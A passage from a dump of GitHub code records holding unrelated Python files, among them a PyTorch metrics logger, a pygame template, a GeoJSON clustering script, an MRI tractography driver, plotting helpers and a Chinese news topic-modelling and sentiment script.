self.metrics.append(\"f1\")\n if confusion_matrix:\n extra_cols += [\"confusion_matrix\"]\n self.metrics.append(\"confusion_matrix\")\n\n df_columns = [\"timestamp\", \"epoch_trained_relative\", \"epochs_trained_total\", \"loss_train\", \"loss_valid\"]\n self.df = _pd.DataFrame(columns=df_columns)\n\n\n def __repr__(self):\n if _jupyter_ipython.in_jupyter():\n display(self.df) # This will just display the pandas dataframe as normally in jupyter notebook\n return \"\"\n else:\n return str(self.df)\n\n def _calculate_metric(self, metric, preds, gt):\n cfm = pytorch_metrics.confusion_matrix(preds, gt, self.num_classes)\n if metric == \"acc\":\n return pytorch_metrics.acc(preds, gt, self.num_classes)\n if metric == \"precision\":\n return pytorch_metrics.precision(preds, gt, self.num_classes, cfm=cfm)\n if metric == \"recall\":\n return pytorch_metrics.recall(preds, gt, self.num_classes, cfm=cfm)\n if metric == \"f1\":\n return pytorch_metrics.f1_score(preds, gt, self.num_classes, cfm=cfm)\n if metric == \"confusion_matrix\":\n return cfm\n\n def update(self, current_epoch, preds: _torch.Tensor, gt: _torch.Tensor, loss_train:_torch.Tensor=None, loss_valid:_torch.Tensor=None):\n # Checks\n _type_check.assert_types([current_epoch, preds, gt, loss_train, loss_valid], [int] + [_torch.Tensor]*4, [False, False, False, True, True])\n\n # Add new row which will be populated one variable at a time\n i = len(self.df)\n self.df.loc[i] = None\n\n # Simple logging stuff\n self.df.loc[i, \"epoch_trained_relative\"] = current_epoch\n self.df.loc[i, \"epochs_trained_total\"] = self.epochs_trained_prior + current_epoch\n self.df.loc[i, \"timestamp\"] = _datetime.today().strftime(\"%Y-%m-%d %H:%M:%S\")\n\n # Losses\n if loss_train:\n self.df.loc[i, \"loss_train\"] = loss_train.clone().cpu().detach().item()\n assert loss_valid.shape == _torch.Size([]), f\"Expected `loss_valid` be a single number, but received `loss_train.shape={loss_valid.shape}`\"\n if loss_valid:\n self.df.loc[i, \"loss_valid\"] = loss_valid.clone().cpu().detach().item()\n assert loss_train.shape == _torch.Size([]), f\"Expected `train_loss` be a single number, but received `loss_train.shape={loss_train.shape}`\"\n\n # Calculate all the metrics and add them one at a time.\n # Some metrics return more then one value (per class, avg_micro, ...). This is handled with dicts\n for metric in self.metrics:\n return_value = self._calculate_metric(metric, preds, gt)\n if isinstance(return_value, dict):\n for name, value in return_value.items():\n self.df.loc[i, name] = str(value)\n elif metric == \"confusion_matrix\":\n self.df.loc[i, metric] = str(return_value.tolist())\n else:\n self.df.loc[i, metric] = str(return_value)\n\n # Check if there's any illegal NAs (only train_loss and valid_loss is allowed to be NA, hence the drop)\n assert not any(self.df.drop(columns=[\"loss_train\", \"loss_valid\"]).iloc[i].isna().tolist()), \\\n f\"At least one value was determined to be NA. The problem occurred in row: {self.df.loc[i]}\"\n\n def get_overall_average(self):\n df_combined = self.df.iloc[0:0].copy()\n df_combined = df_combined.drop(columns=[\"timestamp\"])\n df_combined.loc[0] = None\n\n for col_name in df_combined:\n values_combined = _np.array([_ast.literal_eval(str(l)) for l in self.df[col_name].tolist() if str(l) != \"nan\"])\n if len(values_combined) == 0:\n if col_name not in [\"loss_train\", \"loss_valid\"]: raise RuntimeError(\"Unexpected error. Probably caused by illegal NAs\")\n df_combined[col_name] = None\n elif col_name in [\"epoch_trained_relative\", \"epochs_trained_total\"]:\n df_combined[col_name] = self.df[col_name].max()\n elif \"class\" in col_name:\n df_combined[col_name] = str(values_combined.mean(0))\n elif col_name == \"confusion_matrix\":\n df_combined[col_name] = str(values_combined.sum(0).tolist())\n else:\n df_combined[col_name] = values_combined.mean()\n return df_combined\n\n\nif __name__ == \"__main__\" and False:\n logger = CategoricalLogger(10, 3)\n for epoch in range(5):\n logger.update(epoch, _torch.randint(0, 3, (100,)).long(), _torch.randint(0, 3, (100,)).long(),\n _torch.rand(1)[0], _torch.rand(1)[0])\n print(logger)\n logger.get_overall_average()\n\n\n predictions = _torch.tensor([0, 0, 2, 1, 0, 2, 1, 0, 2, 0, 2, 2]).long()\n labels = _torch.tensor([2, 0, 2, 2, 0, 1, 1, 2, 2, 0, 1, 2]).long()\n\n print(\" \", predictions, \"\\n \", labels)\n C = CategoricalMetrics()\n print(C.confusion_matrix(predictions, labels, 3))\n print(C.precision(predictions, labels, 3))\n print(C.recall(predictions, labels, 3))\n print(C.f1_score(predictions, labels, 3))","repo_name":"Jako-K/utils","sub_path":"dutils/_testing/pytorch_metrics.py","file_name":"pytorch_metrics.py","file_ext":"py","file_size_in_byte":14188,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"42"} +{"seq_id":"23360030958","text":"# pygame_boilerplate.py\r\n\r\nimport pygame\r\n\r\n# ----- CONSTANTS\r\nBLACK = (0, 0, 0)\r\nWHITE = (255, 255, 255)\r\nYELLOW = (255, 255, 0)\r\nSKY_BLUE = (95, 165, 228)\r\nWIDTH = 800\r\nHEIGHT = 600\r\nTITLE = \"\"\r\n\r\n\r\ndef main():\r\n pygame.init()\r\n\r\n # ----- SCREEN PROPERTIES\r\n size = (WIDTH, HEIGHT)\r\n screen = pygame.display.set_mode(size)\r\n pygame.display.set_caption(TITLE)\r\n\r\n # ----- LOCAL VARIABLES\r\n done = False\r\n clock = pygame.time.Clock()\r\n\r\n # ----- MAIN LOOP\r\n while not done:\r\n # -- Event Handler\r\n for event in pygame.event.get():\r\n if event.type == pygame.QUIT:\r\n done = True\r\n\r\n # ----- LOGIC\r\n\r\n # ----- DRAW\r\n screen.fill(BLACK)\r\n\r\n # ----- UPDATE\r\n pygame.display.flip()\r\n clock.tick(60)\r\n\r\n pygame.quit()\r\n\r\n\r\nif __name__ == \"__main__\":\r\n main()\r\n","repo_name":"WongMatthew/PythonBoilerPlate","sub_path":"pygame_boilerplate.py","file_name":"pygame_boilerplate.py","file_ext":"py","file_size_in_byte":889,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"42"} +{"seq_id":"26495306655","text":"import sys\nimport json\nimport pdb\n\n#Nacteni vstupnich argumentu (vstupni a vystupni soubor)\nif len(sys.argv)>2:\n data_import=sys.argv[1]\n data_export=sys.argv[2]\nelse:\n print(\"Nedostatecny pocet vstupnich argumentu!\")\n data_import='stromy.geojson'\n data_export='export.geojson'\n print('Argumenty nastaveny na \"stromy.geojson\" a \"export.geojson\".')\n\n\n# nacteni geojsonu\nwith open(data_import, encoding='utf-8') as f:\n f = json.load(f)\n\n# vytvoreni seznamu a nacteni souradnic do neho\ndata = []\ni = -1\nfor feature in f['features']:\n i = i + 1\n data.append(feature['geometry']['coordinates'])\n data[i].append(0)\n\n#zjisteni stredovych souradnic\ndef get_x_half(data):\n xmin = min(x[0] for x in data)\n xmax = max(x[0] for x in data)\n return (xmax - xmin) / 2 + xmin\n\n\ndef get_y_half(data):\n ymin = min(y[1] for y in data)\n ymax = max(y[1] for y in data)\n return (ymax - ymin) / 2 + ymin\n\n\n#vypocte osy, podle kterych se bude delit\nhalf_x = get_x_half(data)\nhalf_y = get_y_half(data)\n\n\n# rozdeleni bodu podle stredovych souradnic a prirazeni identifikatoru\ndef rozrazeni(data, half_x, half_y):\n #kontrola, zdali vstup uz neobsahuje mene nez 50 bodu\n if len(data)<=50:\n return data\n\n # vytvoreni 4 seznamu\n sektor1 = []\n sektor2 = []\n sektor3 = []\n sektor4 = []\n\n # zjisteni jejich polohy a prirazeni ID clusteru\n i = -1\n for feature in data:\n i = i + 1\n x = data[i][0]\n y = data[i][1]\n if x < half_x and y > half_y:\n data[i][2] = str(data[i][2]) + '1'\n sektor1.append(feature)\n elif x > half_x and y > half_y:\n data[i][2] = str(data[i][2]) + '2'\n sektor2.append(feature)\n\n elif x < half_x and y < half_y:\n data[i][2] = str(data[i][2]) + '3'\n sektor3.append(feature)\n\n elif x > half_x and y < half_y:\n data[i][2] = str(data[i][2]) + '4'\n # pdb.set_trace()\n sektor4.append(feature)\n\n #pokud sektor1,2,3,4 obsahuje vice nez 50 bodu, dochazi k novemu deleni a prirazovani ID\n if len(sektor1) > 50:\n half_x = get_x_half(sektor1)\n half_y = get_y_half(sektor1)\n sektor1=rozrazeni(sektor1, half_x, half_y)\n if len(sektor2) > 50:\n half_x = get_x_half(sektor2)\n half_y = get_y_half(sektor2)\n sektor2=rozrazeni(sektor2, half_x, half_y)\n if len(sektor3) > 50:\n half_x = get_x_half(sektor3)\n half_y = get_y_half(sektor3)\n sektor3=rozrazeni(sektor3, half_x, half_y)\n if len(sektor4) > 50:\n half_x = get_x_half(sektor4)\n half_y = get_y_half(sektor4)\n sektor4=rozrazeni(sektor4, half_x, half_y)\n\n data=sektor1+sektor2+sektor3+sektor4\n return data\n\n# a proto jdou do metody dump na poslednim radku prave data (ne data_after)\ndata_after=rozrazeni(data,half_x, half_y)\n\nwith open(data_export, 'w') as g:\n json.dump(data,g)\n","repo_name":"Martinazije/Zaklady_programovani","sub_path":"ukol2.py","file_name":"ukol2.py","file_ext":"py","file_size_in_byte":2938,"program_lang":"python","lang":"cs","doc_type":"code","stars":0,"dataset":"github-code","pt":"42"} +{"seq_id":"42292915422","text":"import os\nfrom nifti_handler import getfa, getdwidata, getlabelmask, move_bvals, getmask\nimport numpy as np\nfrom tract_manager import create_tracts\nfrom dipy.segment.mask import median_otsu\nfrom dipy.io.image import load_nifti, save_nifti\nfrom diff_preprocessing import dwi_to_mask, denoise_pick\nfrom dif_to_trk import make_tensorfit, QCSA_tractmake\nfrom Daemonprocess import MyPool\nimport multiprocessing as mp\n\ndef orient_to_str(bvec_orient):\n mystr=\"_\"\n for i in np.arange(3):\n if np.abs(bvec_orient[i]) == 1:\n if bvec_orient[i]<0:\n mystr = mystr+\"mx\"\n else:\n mystr = mystr+\"px\"\n if np.abs(bvec_orient[i]) == 2:\n if bvec_orient[i] < 0:\n mystr = mystr + \"my\"\n else:\n mystr = mystr + \"py\"\n if np.abs(bvec_orient[i])==3:\n if bvec_orient[i]<0:\n mystr = mystr+\"mz\"\n else:\n mystr = mystr+\"pz\"\n return mystr\n\n\nmasktype = \"FA\"\nmasktype = \"T1\"\nmasktype = \"dwi\"\nsubject_processes = 1\nfunction_processes = 10\nratio = 10\nget_params = None\ndoprune = True\nlabelslist = []\nfigspath = \"/Volumes/Data/Badea/ADdecode.01/Analysis/\"\noutpath = \"/Volumes/Data/Badea/ADdecode.01/Analysis/\"\ndwipath = \"/Volumes/Data/Badea/ADdecode.01/Data/Anat/20210216_02491/bia6_02491_003.nii.gz\"\nstepsize = 0.5\nvol_b0 = [0,1,2]\nsubject = \"02491\"\nstrproperty = \"_FA\"\nverbose = True\noverwrite = False\noutpathtrk = os.path.join(outpath,subject + strproperty + '_pruned.trk')\nsubject_processes = 1\n\noutpathmask = os.path.join(outpath, subject)\n#data, affine, gtab, vox_size, fdwipath, hdr, header = getdwidata(dwipath, subject, None)\n#mask, _ = dwi_to_mask(data, affine, outpathmask, makefig=False, vol_idx=vol_b0, median_radius=5, numpass=6,\n# dilate=2)\n\n#if masktype == \"FA\":\n# data, affine, gtab, vox_size, fdwipath, hdr, header = getdwidata(dwipath, subject, None)\n# outpathbmfa, mask = make_tensorfit(data, mask, gtab, affine, subject, outpath=dwipath, verbose=verbose)\nif masktype == \"dwi\":\n outpathmask = os.path.join(outpath, subject)\n data, affine, gtab, vox_size, fdwipath, hdr, header = getdwidata(dwipath, subject, None)\n mask, _ = dwi_to_mask(data, affine, outpathmask, makefig=False, vol_idx=vol_b0, median_radius=5, numpass=6,\n dilate=2)\nelif masktype == \"T1\":\n #bet bia6_02491_40006.nii.gz 02491.nii.gz -m -o -f 0.4\n #mv 02491_mask.nii.gz 02491_T1_binary_mask.nii.gz\n mask, affinemask = getmask(outpath,subject,\"T1\",verbose)\n\nimport itertools\nbvec_orient1 = (np.array(list(itertools.permutations([1, 2, 3]))))\nbvec_orient2 = [elm*[-1, 1, 1] for elm in bvec_orient1]\nbvec_orient3 = [elm*[1, -1, 1] for elm in bvec_orient1]\nbvec_orient4 = [elm*[1, 1, -1] for elm in bvec_orient1]\n\nbvec_orient_list = np.concatenate((bvec_orient1, bvec_orient2, bvec_orient3, bvec_orient4))\n\nif subject_processes>1:\n if function_processes>1:\n pool = MyPool(subject_processes)\n else:\n pool = mp.Pool(subject_processes)\n\n tract_results = pool.starmap_async(create_tracts, [(dwipath, outpath, subject, figspath, stepsize, function_processes,\n orient_to_str(bvec_orient), ratio, masktype, labelslist, bvec_orient, doprune,\n overwrite, get_params, verbose) for bvec_orient in bvec_orient_list]).get()\n pool.close()\nelse:\n txtfile = os.path.join(outpath, subject + \"_params.txt\")\n for bvec_orient in bvec_orient_list:\n tract_results = []\n print(bvec_orient)\n str_identifier = orient_to_str(bvec_orient)\n str_identifier = strproperty + str_identifier\n tract_results.append(create_tracts(dwipath, outpath, subject, figspath, stepsize, function_processes,\n str_identifier, ratio, masktype, 'FA', labelslist, bvec_orient, doprune, overwrite, get_params,\n verbose))\n print(tract_results)\n\n \"\"\"\n with open(txtfile, 'a') as f:\n for item in tract_results:\n f.write(\"Subject %s with %s %s %s \\n\" % (item[0],str(bvec_orient[0]),str(bvec_orient[1]),str(bvec_orient[2])))\n f.write(\"Num tracts: %s \\n\" % item[2][0])\n f.write(\"Min tract length: %s \\n\" % item[2][1])\n f.write(\"Max tract length: %s \\n\" % item[2][2])\n f.write(\"Average tract length: %s \\n\" % item[2][3])\n f.write(\"Standard deviancy tract length: %s \\n\" % item[2][4])\n \"\"\"\n","repo_name":"portokalh/wuconnectomes","sub_path":"debugger_files/02491_tractmaker.py","file_name":"02491_tractmaker.py","file_ext":"py","file_size_in_byte":4545,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"42"} +{"seq_id":"2018993967","text":"import setuptools\r\n\r\nwith open(\"README.md\", \"r\") as fh:\r\n long_description = fh.read()\r\n\r\nsetuptools.setup(\r\n name='kpick', \r\n version='1.0.0',\r\n author=\"Trung M. Bui\",\r\n author_email=\"bmtrungvp@gmail.com\",\r\n description=\"An AI picking package\",\r\n long_description=long_description,\r\n long_description_content_type=\"text/markdown\",\r\n url=\"https://github.com/mtbui2010\",\r\n packages= setuptools.find_packages(),\r\n classifiers=[\r\n \"Programming Language :: Python :: 3\",\r\n \"License :: OSI Approved :: MIT License\",\r\n \"Operating System :: OS Independent\",\r\n ],\r\n python_requires='>=3.6',\r\n #entry_points = {\r\n # 'console_scripts': ['ttcv_sample=ttcv.samples.select_sample:run'],\r\n # }\r\n license='MIT', \r\n keywords = ['AI','VISION', 'GRASP DETECTION'],\r\n install_requires=[ \r\n 'numpy',\r\n 'opencv-python',\r\n 'scipy',\r\n 'matplotlib',\r\n \t'ttcv',\r\n 'torch==1.4.0',\r\n 'torchvision==0.5.0',\r\n\t'progress',\r\n\t'ray',\r\n ],\r\n)\t\r\n","repo_name":"mtbui2010/kpick_binary","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":1058,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"42"} +{"seq_id":"73592993727","text":"from abc import ABC, abstractmethod\r\nimport numpy as np\r\nfrom scipy.stats import chi2\r\nfrom matplotlib.patches import Ellipse\r\nfrom mpl_toolkits.mplot3d import Axes3D\r\n\r\n\r\ndef _check_mean_cov(mean, cov, d=2):\r\n mean = np.array(mean)\r\n cov = np.array(cov)\r\n assert len(mean) == cov.shape[0] == cov.shape[1] == d, \"len(mean) must = cov.shape[0] = cov.shape[1]\"\r\n return mean, cov\r\n\r\n\r\nclass CovarianceIntervals(ABC):\r\n \"\"\"\r\n Abstract base class for plotting animated confidence intervals (one derived subclass for number of dimensions,\r\n e.g. 2D ellipses, 3D ellipsoids\r\n \"\"\"\r\n\r\n def get_artists(self):\r\n return self._artists\r\n\r\n @abstractmethod\r\n def update(self, mean, cov):\r\n \"\"\"Update artists for animation\"\"\"\r\n pass\r\n\r\n @abstractmethod\r\n def get_legend_handle(self):\r\n \"\"\"Return an object that can be used by a legend call\"\"\"\r\n pass\r\n\r\n\r\nclass CovarianceEllipses2D(CovarianceIntervals):\r\n \"\"\"Handler for plotting and animating 2D covariance ellipses\"\"\" \r\n def __init__(self, ax, mean=[0,0], cov=[[1,0],[0,1]], ellipse_masses=[0.68, 0.95], alpha=0.3, animated=False, facecolor=None, **kwargs) -> None:\r\n self.mean, self.cov = _check_mean_cov(mean, cov)\r\n self.ax = ax\r\n self._ellipse_scales = np.sqrt(chi2.ppf(ellipse_masses, df=2))\r\n self._artists = []\r\n d1, d2, angle = self._get_ellipse_params()\r\n\r\n for s in self._ellipse_scales:\r\n ellipse = Ellipse(mean, width=d1*s, height=d2*s, angle=angle, alpha=alpha, animated=animated, **kwargs)\r\n if facecolor == 'none':\r\n ellipse.set_facecolor('none')\r\n ax.add_patch(ellipse)\r\n self._artists.append(ellipse)\r\n\r\n def update(self, mean, cov):\r\n self.mean, self.cov = _check_mean_cov(mean, cov)\r\n d1, d2, angle = self._get_ellipse_params()\r\n for ell, s in zip(self._artists, self._ellipse_scales):\r\n ell.set_width(d1*s)\r\n ell.set_height(d2*s)\r\n ell.set_angle(angle)\r\n ell.set_center(mean)\r\n\r\n return self._artists\r\n\r\n def _get_ellipse_params(self):\r\n # Get ellipse parameters (note angle returned in degrees because that's what Ellipse.set_angle() expects)\r\n # Get eigenvalues and sort them (big first)\r\n w, V = np.linalg.eig(self.cov)\r\n idx = -w.argsort()[::-1] \r\n w = w[idx]\r\n V = V[:,idx]\r\n d1, d2 = 2*np.sqrt(w)\r\n angle = np.arctan2(V[1,0], V[0,0])*180.0/np.pi\r\n return d1, d2, angle\r\n\r\n def get_legend_handle(self):\r\n return self._artists[0]\r\n\r\n\r\nclass CovarianceEllipsoids3D(CovarianceIntervals):\r\n \"\"\"Plot covariance ellipsoids in 3D\r\n Based on https://github.com/CircusMonkey/covariance-ellipsoid/blob/master/ellipsoid.py\r\n \"\"\"\r\n\r\n def __init__(self, ax, mean=[0,0,0], cov=np.eye(3), ellipse_masses=[0.68, 0.95], animated=True, num_u: int=40, num_v: int=20, **kwargs) -> None:\r\n self.mean, self.cov = _check_mean_cov(mean, cov, d=3)\r\n assert isinstance(ax, Axes3D), \"Axes must be mpl_toolkits.mplot3d.Axes3D instance\"\r\n self.ax = ax\r\n self.kwargs = {'color': 'b', 'edgecolor': 'none', 'alpha': 0.2}\r\n self.kwargs.update(kwargs)\r\n\r\n # Calculate the target volume of the ellipsoid with the specified confidence bounds\r\n self._ellipsoid_radii = np.sqrt(chi2.ppf(ellipse_masses, 3))\r\n\r\n u = np.linspace(0, 2*np.pi, num_u)\r\n v = np.linspace(0, np.pi, num_v)\r\n x = np.outer(np.cos(u), np.sin(v))\r\n y = np.outer(np.sin(u), np.sin(v))\r\n z = np.outer(np.ones_like(u), np.cos(v))\r\n self._unit_points = np.stack((x.ravel(), y.ravel(), z.ravel()), 0)\r\n self._points_shape = x.shape\r\n\r\n self._artists = []\r\n\r\n for r in self._ellipsoid_radii:\r\n ell = self.ax.plot_surface(*self._make_ellipsoid(r), **self.kwargs)\r\n self._artists.append(ell)\r\n\r\n def _make_ellipsoid(self, radius):\r\n \"\"\"Construct ellipsoid for specified mean, cov and equivalent target radius\"\"\"\r\n\r\n # Extract the Eigenvalues of the covariance to calculate scale \r\n scale = radius/(np.linalg.det(self.cov)**(1.0/6))\r\n\r\n X, Y, Z = scale * (self.cov @ self._unit_points).reshape(3, *self._points_shape)\r\n return X+self.mean[0], Y+self.mean[1], Z+self.mean[2]\r\n\r\n\r\n def update(self, mean, cov):\r\n self.mean, self.cov = _check_mean_cov(mean, cov, d=3)\r\n\r\n for i, r in enumerate(self._ellipsoid_radii):\r\n # I don't like that you have to completely replot, but seems like the only/best way\r\n self._artists[i].remove()\r\n self._artists[i] = self.ax.plot_surface(*self._make_ellipsoid(r), **self.kwargs)\r\n\r\n return self._artists\r\n\r\n def get_legend_handle(self):\r\n \"\"\"Nasty hack to set properties that legend expects to exist\"\"\"\r\n self._artists[0]._facecolors2d = self._artists[0]._facecolor3d\r\n self._artists[0]._edgecolors2d = self._artists[0]._edgecolor3d\r\n return self._artists[0]\r\n ","repo_name":"nrjl/plot_helpers","sub_path":"plot_helpers/covariance_ellipse.py","file_name":"covariance_ellipse.py","file_ext":"py","file_size_in_byte":5108,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"42"} +{"seq_id":"20988750230","text":"import pandas as pd\n# 数据处理库\nimport numpy as np\nimport re\nimport jieba\nimport jieba.analyse\nfrom collections import Counter\nfrom IPython.display import Image\nimport stylecloud\nfrom gensim import corpora, models\nimport itertools\nimport pyLDAvis\nimport pyLDAvis.gensim\nimport os\nimport matplotlib.pyplot as plt\nimport paddlehub as hub\nimport statsmodels.api as sm\nimport seaborn as sns\n\n#LDA建模\ndef lda():\n df = pd.read_excel('棱镜.xlsx')\n df = df.dropna(subset=['正文'], axis=0)\n content = df['正文'].drop_duplicates(keep='first')\n content = content.dropna(how='any')\n\n # def is_all_chinese(strs):\n # for _char in strs:\n # if not '\\u4e00' <= _char <= '\\u9fa5':\n # return False\n # return True\n #\n # stop_words = []\n #\n # with open(\"stopwords_cn.txt\", 'r', encoding='utf-8-sig') as f:\n # lines = f.readlines()\n # for line in lines:\n # stop_words.append(line.strip())\n #\n # f = open('class-fenci.txt', 'w', encoding='utf-8-sig')\n # for line in content:\n # line = line.strip('\\n')\n # # 停用词过滤\n # line = re.sub('[0-9’!\"#$%&\\'()*+,-./:;<=>?@,。?★、…【】《》?“”‘’![\\\\]^_`{|}~\\s]+', \"\", line)\n # seg_list = jieba.cut(line, cut_all=False)\n # cut_words = (\" \".join(seg_list))\n #\n # # 计算关键词\n # all_words = cut_words.split()\n # c = Counter()\n # for x in all_words:\n # if len(x) >= 2 and x != '\\r\\n' and x != '\\n':\n # if is_all_chinese(x) == True and x not in stop_words:\n # c[x] += 1\n # # Top30\n # output = \"\"\n # for (k, v) in c.most_common(30):\n # output += k + \" \"\n #\n # f.write(output + \"\\n\")\n # else:\n # f.close()\n\n fr = open('class-fenci.txt', 'r', encoding='utf-8-sig')\n train = []\n for line in fr.readlines():\n line = [word.strip() for word in line.split(' ') if len(word) >= 2]\n train.append(line)\n\n dictionary = corpora.Dictionary(train)\n corpus = [dictionary.doc2bow(text) for text in train]\n #困惑度模块\n x_data = []\n y_data = []\n for i in range(2,15):\n x_data.append(i)\n lda = models.LdaModel(corpus=corpus, id2word=dictionary, num_topics=i, random_state=111, iterations=400)\n perplexity = lda.log_perplexity(corpus)\n y_data.append(perplexity)\n\n data = pd.DataFrame()\n data['主题数'] = x_data\n data['困惑度'] = y_data\n data.to_csv('困惑度.csv',encoding='utf-8-sig',index=False)\n\n\n # 绘制困惑度折线图\n plt.figure(figsize=(15, 5))\n plt.rcParams['font.sans-serif'] = ['SimHei']\n plt.rcParams['axes.unicode_minus'] = False\n\n plt.plot(x_data, y_data, marker=\"o\")\n plt.title(\"主题建模-困惑度\")\n plt.xlabel('主题数目')\n plt.ylabel('困惑度大小')\n plt.savefig(\"主题建模-困惑度.png\")\n plt.show()\n\n #LDA可视化模块\n lda = models.LdaModel(corpus=corpus, id2word=dictionary, num_topics=11, random_state=111, iterations=400)\n data1 = pyLDAvis.gensim.prepare(lda, corpus, dictionary)\n pyLDAvis.save_html(data1, 'lda.html')\n\n #主题判断模块\n list3 = []\n list2 = []\n for i in lda.get_document_topics(corpus)[:]:\n listj = []\n list1 = []\n for j in i:\n list1.append(j)\n listj.append(j[1])\n list3.append(list1)\n bz = listj.index(max(listj))\n list2.append(i[bz][0])\n\n df['主题概率'] = list3\n df['主题类型'] = list2\n\n df.to_csv('new_困惑度.csv',encoding='utf-8-sig',index=False)\n new_data = df['主题类型'].value_counts()\n new_data = new_data.sort_index(ascending=True)\n y_data1 = [y for y in new_data.values]\n\n #主题词模块\n word = lda.print_topics(num_words=20)\n\n topic = []\n quanzhong = []\n for w in word:\n ci = str(w[1])\n c1 = re.compile('\\*\"(.*?)\"')\n c2 = c1.findall(ci)\n c3 = '、'.join(c2)\n zt = \"Topic\" + str(w[0])\n topic.append(zt)\n quanzhong.append(c3)\n\n df1 = pd.DataFrame()\n df1['所属主题'] = topic\n df1['文章数量'] = y_data1\n df1['特征词'] = quanzhong\n df1.to_excel('data.xlsx',encoding='utf-8-sig',index=False)\n\n#情感分析模块\ndef sentiment():\n df = pd.read_excel('棱镜.xlsx')\n df = df.dropna(subset=['正文'], axis=0)\n\n # 这里使用了百度开源的成熟NLP模型来预测情感倾向\n senta = hub.Module(name=\"senta_bilstm\")\n texts = df['正文'].tolist()\n input_data = {'text': texts}\n res = senta.sentiment_classify(data=input_data)\n df['情感分值'] = [x['positive_probs'] for x in res]\n df.to_csv('情感数据.csv', encoding='utf-8-sig', index=False)\n plt.rcParams['font.sans-serif'] = ['SimHei']\n plt.figure(figsize=(12, 6))\n plt.hist(df['情感分值'], bins=np.arange(0, 1, 0.01), facecolor='#E74C3C')\n plt.xlabel('情感数值')\n plt.ylabel('数量')\n plt.title('情感分析')\n plt.savefig('Analysis of Sentiments.jpg')\n plt.show()\n\n#词云图高频词模块,这块是正文分词\ndef wordclound_zw():\n df = pd.read_excel('棱镜.xlsx')\n df = df.dropna(subset=['正文'], axis=0)\n content = df['正文'].drop_duplicates(keep='first')\n content = content.dropna(how='any')\n\n def is_all_chinese(strs):\n for _char in strs:\n if not '\\u4e00' <= _char <= '\\u9fa5':\n return False\n return True\n\n def get_cut_words(content_series):\n # 读入停用词表\n stop_words = []\n\n with open(\"stopwords_cn.txt\", 'r', encoding='utf-8') as f:\n lines = f.readlines()\n for line in lines:\n stop_words.append(line.strip())\n\n # 分词\n word_num = jieba.lcut(content_series.str.cat(sep='。'), cut_all=False)\n\n # 条件筛选\n word_num_selected = [i for i in word_num if i not in stop_words and len(i) >= 2 and is_all_chinese(i) == True]\n return word_num_selected\n\n text3 = get_cut_words(content_series=content)\n stylecloud.gen_stylecloud(text=' '.join(text3), max_words=100,\n collocations=False,\n font_path='simhei.ttf',\n icon_name='fas fa-circle',\n size=500,\n # palette='matplotlib.Inferno_9',\n output_name='正文-词云图.png')\n Image(filename='正文-词云图.png')\n\n counts = {}\n for t in text3:\n counts[t] = counts.get(t, 0) + 1\n\n ls = list(counts.items())\n ls.sort(key=lambda x: x[1], reverse=True)\n x_data = []\n y_data = []\n\n for key, values in ls[:200]:\n x_data.append(key)\n y_data.append(values)\n\n df1 = pd.DataFrame()\n df1['word'] = x_data\n df1['counts'] = y_data\n df1.to_csv('top200_正文高频词.csv', encoding=\"utf-8-sig\")\n\n#词云图高频词模块,这块是标题分词\ndef wordclound_bt():\n df = pd.read_excel('棱镜.xlsx')\n df = df.dropna(subset=['新闻标题'], axis=0)\n content = df['新闻标题'].drop_duplicates(keep='first')\n content = content.dropna(how='any')\n\n def is_all_chinese(strs):\n for _char in strs:\n if not '\\u4e00' <= _char <= '\\u9fa5':\n return False\n return True\n\n def get_cut_words(content_series):\n # 读入停用词表\n stop_words = []\n\n with open(\"stopwords_cn.txt\", 'r', encoding='utf-8') as f:\n lines = f.readlines()\n for line in lines:\n stop_words.append(line.strip())\n\n # 分词\n word_num = jieba.lcut(content_series.str.cat(sep='。'), cut_all=False)\n\n # 条件筛选\n word_num_selected = [i for i in word_num if i not in stop_words and len(i) >= 2 and is_all_chinese(i) == True]\n return word_num_selected\n\n text3 = get_cut_words(content_series=content)\n stylecloud.gen_stylecloud(text=' '.join(text3), max_words=100,\n collocations=False,\n font_path='simhei.ttf',\n icon_name='fas fa-circle',\n size=500,\n # palette='matplotlib.Inferno_9',\n output_name='标题-词云图.png')\n Image(filename='标题-词云图.png')\n\n counts = {}\n for t in text3:\n counts[t] = counts.get(t, 0) + 1\n\n ls = list(counts.items())\n ls.sort(key=lambda x: x[1], reverse=True)\n x_data = []\n y_data = []\n\n for key, values in ls[:200]:\n x_data.append(key)\n y_data.append(values)\n\n df1 = pd.DataFrame()\n df1['word'] = x_data\n df1['counts'] = y_data\n df1.to_csv('top200_标题高频词.csv', encoding=\"utf-8-sig\")\n\n#多重线性回归\ndef topic_pl():\n df = pd.read_csv('new_棱镜.csv')\n y = df['评论数']\n X = df['主题类型']\n model = sm.OLS(y, X).fit()\n predictions = model.predict(X)\n print(model.summary())\n\n\n#相关性\ndef topic_qg():\n df = pd.read_csv('情感数据.csv')\n plt.rcParams['font.sans-serif'] = ['SimHei']\n plt.rcParams['axes.unicode_minus'] = False\n sns.regplot(x='情感分值', y='评论数', data=df)\n plt.savefig('相关性.png')\n plt.show()\n\n\nif __name__ == '__main__':\n lda()\n sentiment()\n wordclound_zw()\n wordclound_bt()\n topic_pl()\n topic_qg()","repo_name":"13060923171/data-visualization3","sub_path":"数据挖掘实战-新闻文本分析/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":9479,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"42"} +{"seq_id":"43060186815","text":"str = input(\"Greeting: \")\n# print(str)\narray = str.lstrip().lower().split(\" \")\n# print(array)\nif \"hello\" in array[0]:\n print(\"$0\")\nelif \"h\" in array[0][0]:\n print(\"$20\")\nelse:\n print(\"$100\")\n","repo_name":"XuandYu000/cs50x","sub_path":"bank/bank.py","file_name":"bank.py","file_ext":"py","file_size_in_byte":200,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"42"} +{"seq_id":"3938709817","text":"# Function to \n# reverse a string \ndef reverseStr(str): \n n = len(str) \n \n # initialising a empty \n # string 'str1' \n str1 = ''\n i = n-1\n while i >=0:\n str1 += str[i]\n i -= 1\n print(str1) \n \n# Driver Code \ndef main(): \n str = \"geeksforgeeks\"; \n reverseStr(str); \n \nif 